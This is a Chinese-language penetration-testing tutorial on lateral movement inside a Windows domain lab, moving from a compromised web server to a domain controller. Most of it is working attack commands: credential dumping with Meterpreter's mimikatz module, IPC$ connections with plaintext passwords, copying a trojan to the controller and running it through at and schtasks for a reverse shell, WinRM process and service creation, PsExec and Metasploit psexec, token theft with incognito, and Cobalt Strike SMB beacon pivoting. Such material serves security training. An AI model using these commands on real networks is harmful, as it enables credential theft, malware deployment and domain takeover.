当攻击者在拿下一台内网主机后,通常会利用当前拿下的机器当作跳板,进一步攻击 内网其他主机,扩大攻击影响范围。
攻击机:Kali Linux
靶机: Windows server 2008 WEB 10.10.10.20\192.168.XX.XX(跳板机)
Windows server 2012 DC 10.10.10.10\192.168.XX.XX
获得WEB shell后,获取所有账号密码
load kiwi #mimikatz
getsystem 提升权限
creds_all 获取所有帐户密码
#将目标主机账号密码复制下来备用
IPC$ (Internet Process Connection) 是共享"命名管道"的资源,它是为了让进程间 通信而开放的命名管道,通过提供可信任的用户名和口令,连接双方可以建立安全的 通道并以此通道进行加密数据的交换,从而实现对远程计算机的访问。
利用 IPC$ ,连接者与目标主机利用建立的连接可以得到目标主机上的目录结构、用 户列表等信息。
1.开放了 139 、 445 端口;
IPC$ 连接可以实现远程登陆及对默认共享的访问,而 139 端口的开启表示 netbios 协议的应用。
我们可以通过 139 和 445 端口来实现对共享文件/打印机的访问,因此一般来讲, IPC$ 连接是需要 139 或 445 端口来支持的。
IPC$ 连接默认会走 445 端口,不通的话则会走 139 端口,这两个端口都可以单独实 现文件共享
2.目标开启 IPC$ 文件共享服务及默认共享
默认共享是为了方便管理员远程管理而默认开启的共享。
所有逻辑磁盘( c$、d$、e$ ...)和系统目录 WINNT 或 WINDOWS(ADMIN$) ,通过 IPC连接可以实现对这些默认共享的访问
net share
3.需要目标机器的管理员账号和密码
默认情况下只有被添加到远程计算机管理员组的域用户(域管用户)有权限对 admin$ 目录建立 IPC 连接
本地的 Administrator 用户也可以,但是默认情况下该用户是被禁用的,如果启用了该用户,那么也可以使用 Administrator 用户远程连接
1. 连接
net use \\10.10.10.10\ipc$ /user:web\administrator "admin@123"
2. 查看连接情况
net use
3. 查看目标主机时间
net time \\10.10.10.10
4. 删除连接
net use \\10.10.10.10\ipc$ /del
net use * /del /y #删除所有连接
5. 文件上传下载
copy shell.exe \\10.10.10.10\c$\windows\temp\xxx.exe
copy \\10.10.10.10\c$\xxx.exe c:\ #从目标机器下载到本地
6. 查看目标主机文件
dir \\10.10.10.10\c$
7. 开放/关闭 ipc$ 共享
net share ipc$
net share ipc$ /del
8. 共享计算机 C 盘
net share C=c:\
9. 映射共享磁盘到本地
net use z: \\10.10.10.10\c$ /user:administrator "xxxxxxxxx"
10. 查看/删除共享的资源
net share
net share C /del
11. 取消IPC远程连接
net use c: /del
net use * /del /y
#建议手打命令
IPC$连接失败常见错误号
错误号 5,拒绝访问 【很可能你使用的用户不是管理员权 限,先提升权限】
错误号 51,Windows 无法找到网络路径 【网络有问题】
错误号 53,找不到网络路径 【ip 地址错误;目标未开机;目标 lanmanserver 服务未启动;目标有防火墙(端口过滤)】
错误号 67,找不到网络名 【你的 lanmanworkstation服务未启动;目标删除了 ipc$;】
错误号 1219,提供的凭据与已存在的凭据集冲突 【你已经和对方建立了一个 ipc$,请删除后再连】
错误号 1326,未知的用户名或错误密码 【用户名或密码错误】
错误号 1385,登录失败:未授予用户在此计算机上的请求登录类型
错误号 1792,试图登录,但是网络登录服务没有启动 【目标NetLogon服务未 启动[连接域控会出现此情况]】
错误号 2242,此用户的密码已经过期 【目标有帐号策略,强 制定期要求更改密码】
AT命令可在指定时间和日期、在指定计算机上运行命令和程序
#Windows2012以下系统可使用at命令
net use \\10.10.10.10\C$ /user:starry\administrator "admin@123"
copy c:\\dc.exe \\10.10.10.10\c$\windows\temp\6888.exe #下载木马
查看远程主机时间:net time \\10.10.10.10
AT命令添加任务:at \\10.10.10.10 10:10 c:\6888.exe
AT命令删除任务:at \\10.10.10.10 1 /delete
AT命令查看任务:at \\10.10.10.10 #查看at任务列表,已经执行了的,不会显示
由于 AT 在 windows server 2012 等新版系统中已被弃用,所以需要使用 schtasks 命令代替
允许管理员创建、删除、查询、更改、运行和中止本地或远程系统上的计划任务
请参考:Windows使用SCHTASKS 命令执行定时任务_刘李404not found的博客-CSDN博客
创建任务
schtasks /create /tn task /U 域\域用户 /P 域用户密码 /tr 命令 /sc ONSTART /s 域机器ip /RU system
运行任务
schtasks /run /tn task /s 192.168.10.2 /U 域/域用户 /P 域用户密码
删除任务
schtasks /F /delete /tn task /s 域机器ip /U 域\域用户 /p 域用户密 码
schtasks /create 创建新的计划任务。
/sc schedule 指定计划类型。有效值为 MINUTE、HOURLY、 DAILY、WEEKLY、MONTHLY、ONCE、ONSTART、ONLOGON、ONIDLE。
/mo modifier 指定任务在其计划类型内的运行频率。这个参数 对于 MONTHLY 计划是必需的。
对于 MINUTE、HOURLY、DAILY 或 WEEKLY 计划,这个参数有效,但也可选。默认值为 1。 /tr 指定任务运行的程序或命令。如果忽略该路径, SchTasks.exe 将假定文件在 Systemroot\System32 目录下。
/tn 指定任务的名称。
建立IPC连接
net use \\10.10.10.10\ipc$ "admin@123" /user:administrator #连接DC主机
上传木马
dir \\10.10.10.10\c$
copy c:\6888.exe \\10.10.10.10\c$
远程主机创建定时任务
schtasks /create /s 10.10.10.10 /u "dc\administrator" /p "admin@123" /sc MINUTE /mo 1 /tn task /tr "c:\\6888.exe" #复制命令可能报错!建议手打命令
一分钟后,反弹shell
查看远程主机创建的定时任务
chcp 65001 #不更改代码页编码,直接查看可能会报错
schtasks /query /s 10.10.10.10 /tn task #查看定时任务
Schtasks运行远程主机上的计划任务
schtasks /run /s 10.10.10.10 /u administrator /p "admin@123" /tn task
Schtasks删除远程主机上的计划任务
schtasks /delete /tn task /s 10.10.10.10 /u dc\administrator /p admin@123
WinRM 指的是Windows远程管理服务,通过远程连接winRM模块可以操作 windows命令行,默认监听端口5985(HTTP)和5986 (HTTPS),在2012及以后默认开启
开启WinRM
判断本机是否开启WinRM服务
winrm enumerate winrm/config/listener
查看远程主机是否开启WinRM服务:
serverscan.exe -h 10.10.10.10 -p 5985,5986
nmap -A sV 192.168.1.6 -p 5985,5986
命令开启WinRM服务
winrm quickconfig
允许远程主机访问及访问远程主机
WinRM只允许当前域用户或者处于本机TrustedHosts列表中的远程主机进行访问
winrm set winrm/config/client @{TrustedHosts="*"} #允许所有主机访问
winrs -r:http://10.10.10.10:5985 -u:administrator -p:admin@123 ipconfig #建议手打命令
winrs -r:http://10.10.10.10:5985 -u:administrator -p:admin@123 "cmd.exe"
利用winrm参数选项中的invoke参数,来对目标对象执行特定的方法。
winrm invoke create wmicimv2/win32_process @{Commandline="calc.exe"}
命令调用了Windows WMI中Win32_process类的Create方法,生成了一个 calc.exe的新进程
在远程机器上打开进程
winrm invoke create wmicimv2/win32_process @{Commandline="calc.exe"} -r:http://10.10.10.10:5985 - u:administrator -p:admin@123
在远程机器上创建服务
winrm invoke Create wmicimv2/Win32_Service @{Name="task";DisplayName="test";PathName="cmd.exe /k c:\6888.exe"} -r:http://10.10.10.10:5985 -u:administrator - p:admin@123
在远程机器上启动服务
winrm invoke StartService wmicimv2/Win32_Service?Name=task -r:http://10.10.10.10:5985 -u:administrator -p:admin@123
PsExec是一种轻巧的telnet替代品,可让您在其他系统上执行进程,并为控制台应用 程序提供完整的交互性,而无需手动安装客户端软件。
Psexec原理
1. ipc$ 连接,释放 Psexesvc.exe
2. 通过服务管理 OpenSCManager 打开受害者机器上服务控制管理器的句柄
3. 通过 CreateService 创建服务
4. 获取服务句柄 OpenService 使用 StartService 启动服务
Psexec使用前提
1. 对方主机开启了 admin$ 共享,如果关闭了 admin$ 共享,会提示:找不到网络名
2. 对方未开启防火墙
3. 如果是工作组环境,则必须使用 administrator 用户连接(因为要在目标主机 上面创建并启动服务),使用其他账号(包括管理员组中的非administrator用户) 登录都会提示访问拒绝访问。
4. 如果是域环境,即可用普通域用户连接也可以用域管理员用户连接。连接普通域 主机可以用普通域用户,连接域控只能用域管理员账户。
PsExec.exe使用
微软官方工具包
PsExec - Sysinternals | Microsoft Learn
IPC连接
net use \\10.10.10.10\ipc$ /user:administrator "admin@123"
建立IPC连接,无需输入密码
反弹cmd:
PsExec64.exe \\10.10.10.10 -s cmd.exe -accepteula
无法启动服务,执行命令没有回显,但是可以运行木马上线。
在WEB主机上可以运行命令
impacket 套件中的 Psexec 与官方 psexec.exe 相比会自动删除服务,增加隐蔽性.
下载地址:
https://github.com/SecureAuthCorp/impacket
psexec.py starry/administrator:admin@[email protected]
目标机器没有python环境,所以把 .py文件打包成 .exe文件
下载地址:
https://github.com/maaaaz/impacket-examples-windows
psexec.exe starry/administrator:admin@[email protected] whoami
Psexec
use exploit/windows/smb/psexec
set RHOSTS 10.10.10.10
set SMBDomain starry
set smbuser administrator
set smbpass admin@123
exploit
Token窃取
Windows有两种类型的Token:
Delegation token(授权令牌):用于交互会话登录(例如本地用户直接登录、远程 桌面登录) Impersonation token(模拟令牌):用于非交互登录(利用net use访问共享文件夹)
两种token只在系统重启后清除
具有Delegation token的用户在注销后,该Token将变成Impersonation token,依旧有效
Metasploit
在Metasploit中,可使用incognito实现token窃取,Metasploit中的 incognito,是从windows平台下的incognito移植过来的
# 加载incognito模块
load incognito
# 列举token
list_tokens -u
# 查看当前token
getuid
# 提示至system权限
getsystem
# token窃取
impersonate_token "NT AUTHORITY\\SYSTEM"
# 从进程窃取token
steal_token 1208
# 返回之前token
rev2self | drop_token
跳板机:Windows 7 旗舰版
内网机器:Windows server2008、Windows server 2012
跳板机提升权限
利用ms14-058漏洞
凭证获取
hashdump #获取hash
logonpasswords #获取明文密码
扫描存活主机
PortScan扫描存活主机 #没有扫描结果
Net View 网络视图
结果如下:
Psexec
由于DC不出网,需要添加正向监听
选择Beacon SMB,点击保存
选择DC右击,选择psexec
Domain:域名
Listener:选择刚才生成的Beacon SMB
session:选择web主机
点击Launch
##前提是知道目标主机密码!!!
上线成功
...